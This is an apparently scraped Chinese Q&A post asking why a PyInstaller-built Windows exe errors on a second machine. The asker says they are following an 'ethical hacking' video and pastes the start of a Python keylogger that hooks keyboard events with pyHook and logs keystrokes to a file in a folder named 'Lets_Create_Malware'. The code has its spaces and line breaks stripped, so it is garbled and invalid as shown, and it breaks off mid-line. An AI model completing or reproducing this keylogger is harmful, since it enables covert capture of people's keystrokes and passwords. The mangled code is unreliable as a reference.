jjzjj

python - Pyinstaller 创建的 exe 在一台机器上运行,但在另一台机器上出错

主机操作系统:Windows10,64位Python:2.7版,32位对于道德黑客,我正在关注视频,EthicalHackingPythonKeylogger我根据视频创建了代码,importpyHook,pythoncom,sys,loggingfile_log='C:\\Lets_Create_Malware\\log.txt'defOnKeyboardEvent(event):logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')chr(event.Ascii)logging.